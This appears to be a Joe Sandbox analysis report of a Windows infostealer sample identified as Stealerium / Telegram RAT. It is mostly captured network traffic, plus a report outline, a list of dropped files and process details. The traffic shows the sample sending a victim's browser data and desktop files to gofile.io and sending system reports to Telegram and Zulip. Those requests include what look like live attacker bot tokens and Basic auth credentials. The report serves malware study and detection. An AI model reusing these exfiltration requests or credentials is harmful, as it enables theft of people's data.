2024-11-29 11:18:35 UTC	1110	IN	Data Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37 Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:40 UTC	121	OUT	GET /bot7392736411:AAHVxAQAPdF2QLjSPGIcPPJHT3uoJnmmeOM/getMe HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-29 11:18:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 29 Nov 2024 11:18:41 GMT Content-Type: application/json Content-Length: 261 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 11:18:41 UTC	261	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 37 33 39 32 37 33 36 34 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 5c 75 30 31 62 30 75 20 56 69 61 20 46 61 63 65 62 6f 6f 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 75 75 76 69 61 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 74 72 75 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 63 6f 6e 6e 65 63 74 5f 74 6f 5f 62 75 73 69 6e 65 73 73 22 3a 66 61 6c 73 65 2c 22 68 61 73 5f 6d 61 69 6e 5f 77 65 62 5f 61 70 70 22 3a 66 Data Ascii: {"ok":true,"result":{"id":7392736411,"is_bot":true,"first_name":"L\u01b0u Via Facebook","username":"Luuvia_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":f

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:48 UTC	70	OUT	GET /servers HTTP/1.1 Host: api.gofile.io Connection: Keep-Alive
2024-11-29 11:18:48 UTC	1116	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 29 Nov 2024 11:18:48 GMT Content-Type: application/json; charset=utf-8 Content-Length: 387 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Credentials: true Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 ETag: W/"183-8QifD2XmzNH+i5CvAVt5kwLY+WM"
2024-11-29 11:18:48 UTC	387	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 35 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 30 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 32 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 39 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 38 22 2c 22 7a 6f 6e Data Ascii: {"status":"ok","data":{"servers":[{"name":"store5","zone":"eu"},{"name":"store10","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store9","zone":"na"},{"name":"store8","zon

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:50 UTC	207	OUT	POST /uploadfile HTTP/1.1 Content-Type: multipart/form-data; boundary="686ae045-3350-483a-be65-d9e368970df2" Host: store5.gofile.io Content-Length: 153577 Expect: 100-continue Connection: Keep-Alive
2024-11-29 11:18:50 UTC	40	OUT	Data Raw: 2d 2d 36 38 36 61 65 30 34 35 2d 33 33 35 30 2d 34 38 33 61 2d 62 65 36 35 2d 64 39 65 33 36 38 39 37 30 64 66 32 0d 0a Data Ascii: --686ae045-3350-483a-be65-d9e368970df2
2024-11-29 11:18:50 UTC	123	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 61 6c 62 75 73 40 31 32 34 34 30 36 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 6c 62 75 73 25 34 30 31 32 34 34 30 36 5f 65 6e 2d 43 48 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=file; filename="user@124406_en-CH.zip"; filename*=utf-8''user%40124406_en-CH.zip
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: 50 4b 03 04 14 00 01 08 00 00 54 32 7d 59 00 00 00 00 0c 00 00 00 00 00 00 00 19 00 00 00 42 72 6f 77 73 65 72 73 2f 45 64 67 65 2f 48 69 73 74 6f 72 79 2e 74 78 74 93 95 31 d6 b8 67 12 88 b9 21 cd 85 50 4b 03 04 14 00 09 08 08 00 55 32 7d 59 71 80 43 5d 74 00 00 00 dc 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 2f 46 69 72 65 66 6f 78 2f 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 d9 36 1d 23 b5 ae dc ae 7a 2e 70 f4 94 0c 10 97 3a 1c 8d 73 b5 11 aa 89 6e 4a b2 6d 34 65 3c a7 a8 d7 90 e5 96 d8 df 95 33 3b b4 e0 d7 7e 8f fc 1b 27 09 a8 eb e6 52 75 a5 35 9e 18 29 ee fe 97 f3 00 2c 3f 7c c3 41 ae 62 60 84 7a 45 f8 78 3e 33 da ef 01 e1 02 29 de 07 45 79 19 43 fd 63 43 0e 0e 99 ee d4 ea dc fe 33 07 b1 ce f9 6d 45 28 1c 67 57 d2 50 4b 07 08 71 80 43 5d 74 00 00 00 Data Ascii: PKT2}YBrowsers/Edge/History.txt1g!PKU2}YqC]tBrowsers/Firefox/Bookmarks.txt6#z.p:snJm4e<3;~'Ru5),?\|Ab`zEx>3)EyCcC3mE(gWPKqC]t
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: 4e 10 b6 5a 7f 8d b8 b4 28 33 19 ac aa a4 33 17 1d c3 8f af df 50 4b 07 08 ef 61 47 0e 28 00 00 00 17 00 00 00 50 4b 03 04 14 00 09 08 08 00 70 43 45 57 41 d8 5d dc 93 02 00 00 02 04 00 00 32 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 61 6c 62 75 73 2f 44 65 73 6b 74 6f 70 2f 45 46 4f 59 46 42 4f 4c 58 41 2e 70 6e 67 13 d2 cf 40 52 38 aa e8 7a e1 80 3c ed 49 b6 05 e6 7e e7 e1 49 d2 41 63 da 18 19 0b bc db 49 7c f3 18 7c c2 05 a9 66 a0 bc e5 7d c0 71 24 d0 c3 22 9c 54 ec 37 33 dc 3a 2f df 2e 76 ab 16 9c 60 9a 48 df f4 58 fc f4 a3 b9 0a 66 db 56 06 b1 c8 4b a7 32 c6 31 1c e1 b9 72 f5 70 73 a8 08 4d e9 03 f5 40 6c 33 72 3c 63 62 55 ad b8 70 9a 47 ac 17 a7 de e3 b2 2a 78 25 f5 ca c4 f7 cc 27 dd 08 a2 8a dc ec 1a b8 98 75 91 00 Data Ascii: NZ(33PKaG(PKpCEWA]2Grabber/DRIVE-C/Users/user/Desktop/EFOYFBOLXA.png@R8z<I~IAcI\|\|f}q$"T73:/.v`HXfVK21rpsM@l3r<cbUpG*x%'u
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: fb 0f 37 ec 35 5e 15 04 32 a7 c1 7f 6d e0 f4 c7 99 c8 14 90 1e 57 63 24 09 9c d5 b0 1c 0b 76 1b 52 90 2f 55 3d 60 77 1d 69 1c 33 71 9f 00 da 38 90 43 81 ed 3a 10 ea 94 ae ea 09 36 fb ea 0c ac ac 66 c1 53 59 52 94 df 28 99 5b 7a 84 98 e1 18 80 7f f2 e4 e8 cd d1 64 d1 07 84 6f 37 3f c5 15 9b 9d 3a 92 de cc 7f 94 03 ca fd be 8e a7 8d c8 ca 6d 53 42 aa dc 5b 00 9e 11 73 35 ee 44 64 0b ce ce a4 c7 2c a8 04 2d eb 4c a6 6e 24 dd 65 08 c7 40 fa eb 7c 74 81 32 10 f3 a1 77 8a 9d 0f 8b b3 af 73 f1 e9 97 ef e5 48 c0 a8 3c e2 87 78 e5 29 06 e7 50 bf a2 2a 89 50 8b be 05 e0 b1 d5 72 68 4f 7c c6 73 0c 7a af 11 c3 e2 3b 66 cb f0 cb 55 5a e2 cc b7 04 9a 2a af 86 49 2b 74 72 c6 e0 4a e5 d4 31 76 d8 35 a6 f5 2b 27 73 56 8c 7a ff 96 00 26 86 e7 c6 12 3e 6f 6a 33 a5 e7 ed 3b Data Ascii: 75^2mWc$vR/U=`wi3q8C:6fSYR([zdo7?:mSB[s5Dd,-Ln$e@\|t2wsH<x)PPrhO\|sz;fUZI+trJ1v5+'sVz&>oj3;
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: cc 78 aa c1 81 af 25 30 17 41 bc e3 f9 34 c7 af 07 3e 2b 58 3b 28 c4 4a 05 44 6c af 2d d0 7a 65 03 8f 1e 78 04 51 86 c2 79 63 f7 bf a3 1a 42 d0 49 1d 67 1a e3 62 8d 39 66 33 2a f9 45 65 72 12 30 7d f3 b5 e0 a7 a4 19 ff ff 44 92 8d a1 77 be 1b 05 8a a1 de db 90 90 de 4b 76 fa a1 15 bb 81 0e 99 97 df 2e 2c 8e c5 c8 85 9a 19 83 23 2e b5 71 9a a6 ae 13 51 cf b6 c6 8a d3 9b 08 2e 40 c0 eb 38 30 e5 75 a4 2e 34 86 b7 40 b6 a7 50 4b 07 08 21 21 bf d3 93 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 70 43 45 57 52 4a cc 0f 92 02 00 00 02 04 00 00 32 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 61 6c 62 75 73 2f 44 65 73 6b 74 6f 70 2f 53 51 53 4a 4b 45 42 57 44 54 2e 6a 70 67 6a 20 7e 5b b1 52 0b 3d 47 30 b5 28 35 22 65 7b 52 d1 Data Ascii: x%0A4>+X;(JDl-zexQycBIgb9f3*Eer0}DwKv.,#.qQ.@80u.4@PK!!PKpCEWRJ2Grabber/DRIVE-C/Users/user/Desktop/SQSJKEBWDT.jpgj ~[R=G0(5"e{R
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: e8 a0 ea 88 4c 79 02 4c da fd 46 6e 9b 84 4b 5c e8 7c 44 97 95 39 8b b8 8c fe 9b ca ff ab ae 93 d2 f7 a1 e9 f0 f9 92 04 f4 41 40 70 34 42 21 ae e8 fe 5b 3e e2 ff 80 7a b2 57 13 d6 cc 77 33 14 ae 7d 96 3c df 08 04 b2 ed 48 0c 03 ac 72 6d ce 39 bb 64 f6 57 f9 45 2e d4 b6 c5 8c a5 9f e4 36 79 88 f1 87 10 fa 8d e2 d7 15 e9 98 74 44 a3 6c 44 60 0e ba 2b a6 3b 8a ed 88 42 d3 ec 6c e6 e8 c0 64 48 68 d8 54 56 0c dc 7c b7 53 cb 23 4e 64 b2 10 96 db 66 ee 50 e1 7f 66 68 a9 f6 7b e7 83 22 50 dd 0b f2 f3 b1 aa 30 ae 9b a3 2a 06 b1 47 60 20 9e 48 ae c5 6a 9b bc d7 e1 56 cf 12 3f ba 63 f2 57 f8 1c 0a 58 d1 40 2f 22 32 d0 5e 0e 09 5e 47 e4 04 c3 a7 2e 6c 17 30 7f 8b 7f 2c a1 27 ca 9a dc ad 2d 97 2b dd 5b 70 cc 1e 0a ba ac a4 c4 79 52 9f 79 40 ee a1 25 d5 32 29 16 5f a8 Data Ascii: LyLFnK\\|D9A@p4B![>zWw3}<Hrm9dWE.6ytDlD`+;BldHhTV\|S#NdfPfh{"P0*G` HjV?cWX@/"2^^G.l0,'-+[pyRy@%2)_
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: db 6f a9 67 77 a8 bd c6 09 69 ad 54 cf dd 6f 7c 5d 4d 70 69 bb 90 2a 60 12 f2 b5 d1 0a 67 e0 57 ed 0c 00 3a 99 14 6f ed 77 ee 57 e1 eb 17 1c e3 94 56 33 83 34 0d 12 65 ed 57 d8 92 91 b8 d6 fc 29 e3 f6 16 ae e0 60 b3 8f 05 fe 47 57 1b e5 65 f3 91 d5 b5 ba b0 38 81 01 bc 3c f9 56 47 b8 be fd 46 36 b1 5d b9 4a 07 98 23 6d cf 06 46 72 f0 cd c2 b8 09 af 62 52 a5 38 53 01 fc fb 88 4d ec 49 be 49 a7 79 a3 36 df 80 85 55 ab 59 92 ed 5e 23 f2 6e 38 a7 ab de a1 15 3f ce f0 a5 60 8f 5e 6d 7d 5a 0f 33 3a d5 9d 5f d6 fa 7c 49 05 7c af 67 71 61 0c 87 cc e2 8d 28 8e 30 04 5e b2 e2 b2 37 ce 70 1b fd 72 03 1e 5d 67 a6 7b 04 fc 92 25 5d 5a 72 37 63 c5 54 62 02 87 5c 45 2b f6 b8 11 32 9e df 9f 1c 8f cb 07 c4 2f b9 70 24 fb 93 02 00 cf a0 a4 78 34 4d 78 0c 58 49 0f 1c b0 71 Data Ascii: ogwiTo\|]Mpi*`gW:owWV34eW)`GWe8<VGF6]J#mFrbR8SMIIy6UY^#n8?`^m}Z3:_\|I\|gqa(0^7pr]g{%]Zr7cTb\E+2/p$x4MxXIq
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: c6 36 c6 53 bc 08 29 62 57 bc b3 7e 3c 73 63 52 85 7d 40 92 f2 d5 ec 21 e5 9f 4f 5b da 53 6f 29 f2 36 ba c6 96 b8 09 e1 0f 91 a1 30 c7 3b 22 ac 63 4a 6e f9 87 50 c1 d5 82 f4 ae 13 9e ef ca 61 e0 62 50 4b 07 08 cd c1 ac d8 93 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 70 43 45 57 94 e2 4b 0f 94 02 00 00 02 04 00 00 3d 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 61 6c 62 75 73 2f 44 65 73 6b 74 6f 70 2f 4e 45 42 46 51 51 59 57 50 53 2f 50 57 43 43 41 57 4c 47 52 45 2e 6a 70 67 14 fa bf 89 90 c6 d4 8a 6a d3 4d 8e cf 3c 3a 1e cc e9 2b 24 dc 65 18 23 7b f0 5f 13 2c f0 e0 39 31 e4 90 f1 4b d1 e1 8e c1 50 87 21 5f 6f 51 e4 fd 06 cd 76 e1 a2 68 3e d6 7c 3d d2 65 a5 58 3c 73 80 3b 2a 21 2c 8a cb 9d cc e5 2b 6a 11 17 b0 6d 5c Data Ascii: 6S)bW~<scR}@!O[So)60;"cJnPabPKPKpCEWK=Grabber/DRIVE-C/Users/user/Desktop/NEBFQQYWPS/PWCCAWLGRE.jpgjM<:+$e#{_,91KP!_oQvh>\|=eX<s;*!,+jm\
2024-11-29 11:18:50 UTC	4096	OUT	Data Raw: c2 4b 03 3d 05 35 f5 1f 38 cc f5 de de e3 23 95 f8 47 fe 43 14 d9 03 50 74 a3 f6 21 51 47 29 ac b1 54 4a 21 3c 00 8e d0 37 0f 9e 27 16 78 84 c9 a7 0b 32 20 90 fb d1 59 e2 e1 e9 fe b9 2b ca 03 b2 01 28 bc 19 98 f0 7c 98 16 b5 ea 6f 0b 22 05 4b 58 44 7c 98 73 77 4b 8c 26 7e da 4d b5 6e 8a fc 3a cc 9f 03 08 fb 3a 8f c5 bb 1c 72 84 6f f0 a4 d2 15 d8 1c d2 bf 4c d2 0c 22 9c ff a0 a1 a5 67 a1 1b de 6a 97 bd 5b e8 42 8e fe 94 7c 3b 6f 19 89 84 db 37 df 79 2e 49 9b b3 ba 4c e8 3a ef eb 12 9b 75 ef 50 15 94 ee 0c f5 4a 2d b2 66 44 42 c1 9e 61 08 76 ad df 5f 22 be 18 f9 16 87 e1 e9 5b c1 e5 aa d7 3f 1c 75 0d c2 b0 a0 67 33 72 c5 fc 7b 1b bd aa 90 44 5a 19 46 a0 0f 56 71 5a 52 d3 6f 1d 19 b4 92 43 30 60 45 a0 83 97 5c 0b 89 85 2e e5 6c f5 9a 35 b2 43 97 8c 6c ba f5 Data Ascii: K=58#GCPt!QG)TJ!<7'x2 Y+(\|o"KXD\|swK&~Mn::roL"gj[B\|;o7y.IL:uPJ-fDBav_"[?ug3r{DZFVqZRoC0`E\.l5Cl
2024-11-29 11:18:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-29 11:18:52 UTC	888	IN	HTTP/1.1 200 OK Server: nginx/1.27.2 Date: Fri, 29 Nov 2024 11:18:52 GMT Content-Type: application/json Content-Length: 439 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range {"data":{"createTime":1732879132,"downloadPage":"https://gofile.io/d/qxyGTh","guestToken":"ey6uqHgWr0VdqX5Y8EaLpMBS2h1Wue5G","id":"b94fe560-5bbe-4d51-acdf-652d471dd87e","md5":"3d9952ca2b820a3282ca6c7b048cce19","mimetype":"application/zip","modTime":1732879132,"name":"user@124406_en-CH.zip","parentFolder":"d87cb92e-bd72-47ff-a6b2-6eb786b8fe16","parentFolderCode":"qxyGTh","servers":["store5"],"size":153370,"type":"file"},"status":"ok"}

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:55 UTC	2089	OUT	GET /bot7392736411:AAHVxAQAPdF2QLjSPGIcPPJHT3uoJnmmeOM/sendMessage?chat_id=-4549067482&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.1%20-%20Report%3A%2A%0ADate%3A%202024-11-29%206%3A18%3A31%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20124406%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20NVR6G%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%2 [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-11-29 11:18:56 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 29 Nov 2024 11:18:56 GMT Content-Type: application/json Content-Length: 1668 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 11:18:56 UTC	1668	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 39 32 37 33 36 34 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 5c 75 30 31 62 30 75 20 56 69 61 20 46 61 63 65 62 6f 6f 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 75 75 76 69 61 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 34 39 30 36 37 34 38 32 2c 22 74 69 74 6c 65 22 3a 22 33 42 2c 20 4c 5c 75 30 31 62 30 75 20 56 69 61 20 46 61 63 65 62 6f 6f 6b 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 Data Ascii: {"ok":true,"result":{"message_id":79,"from":{"id":7392736411,"is_bot":true,"first_name":"L\u01b0u Via Facebook","username":"Luuvia_bot"},"chat":{"id":-4549067482,"title":"3B, L\u01b0u Via Facebook","type":"group","all_members_are_administrators":true},"da

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yv7QsAR49V.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Stealerium

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4d347f08-badb-4aa2-85cc-e67036e9d72f.bat

C:\Users\user\AppData\Local\Temp\Stealerium-Latest.log

C:\Users\user\AppData\Local\Temp\tmpA382.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpA3B2.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpA3C3.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpADAB.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpADBC.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpADEC.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpADFC.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB787.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpB805.tmp.dat

Windows Analysis Report
yv7QsAR49V.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:18:59 UTC	278	OUT	POST /api/v1/messages HTTP/1.1 Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM= Content-Type: application/x-www-form-urlencoded Host: szurubooru.zulipchat.com Content-Length: 1650 Expect: 100-continue Connection: Keep-Alive
2024-11-29 11:18:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-11-29 11:18:59 UTC	1650	OUT	Data Raw: 74 79 70 65 3d 73 74 72 65 61 6d 26 74 6f 3d 53 7a 75 72 75 62 6f 6f 72 75 26 74 6f 70 69 63 3d 61 6c 62 75 73 26 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 25 30 41 25 46 30 25 39 46 25 39 38 25 42 39 2b 25 32 41 53 74 65 61 6c 65 72 69 75 6d 2b 76 33 2e 35 2e 31 2b 2d 2b 52 65 70 6f 72 74 25 33 41 25 32 41 25 30 41 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 31 2d 32 39 2b 36 25 33 41 31 38 25 33 41 33 31 2b 61 6d 25 30 41 53 79 73 74 65 6d 25 33 41 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 2b 25 32 38 36 34 2b 42 69 74 25 32 39 25 30 41 55 73 65 72 6e 61 6d 65 25 33 41 2b 61 6c 62 75 73 25 30 41 43 6f 6d 70 4e 61 6d 65 25 33 41 2b 31 32 34 34 30 36 25 30 41 4c 61 6e 67 75 61 67 65 25 33 41 2b 25 46 30 25 39 46 25 Data Ascii: type=stream&to=Szurubooru&topic=user&content=%60%60%60%0A%F0%9F%98%B9+%2AStealerium+v3.5.1+-+Report%3A%2A%0ADate%3A+2024-11-29+6%3A18%3A31+am%0ASystem%3A+Microsoft+Windows+10+Pro+%2864+Bit%29%0AUsername%3A+user%0ACompName%3A+124406%0ALanguage%3A+%F0%9F%
2024-11-29 11:18:59 UTC	747	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:18:59 GMT Content-Type: application/json Content-Length: 81 Connection: close Server: nginx/1.18.0 (Ubuntu) Vary: Accept-Encoding Expires: Fri, 29 Nov 2024 11:18:59 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private Vary: Accept-Language Content-Language: en X-RateLimit-Limit: 200 X-RateLimit-Remaining: 197 X-RateLimit-Reset: 1732879199 Strict-Transport-Security: max-age=15768000 X-Frame-Options: DENY X-Content-Type-Options: nosniff Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Authorization Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, HEAD {"result":"success","msg":"","id":485077238,"automatic_new_visibility_policy":3}

Target ID:	0
Start time:	06:18:30
Start date:	29/11/2024
Path:	C:\Users\user\Desktop\yv7QsAR49V.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\yv7QsAR49V.exe"
Imagebase:	0x24a436a0000
File size:	3'746'816 bytes
MD5 hash:	03A0E76A8C671D5D10CAF9B73F17C2BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
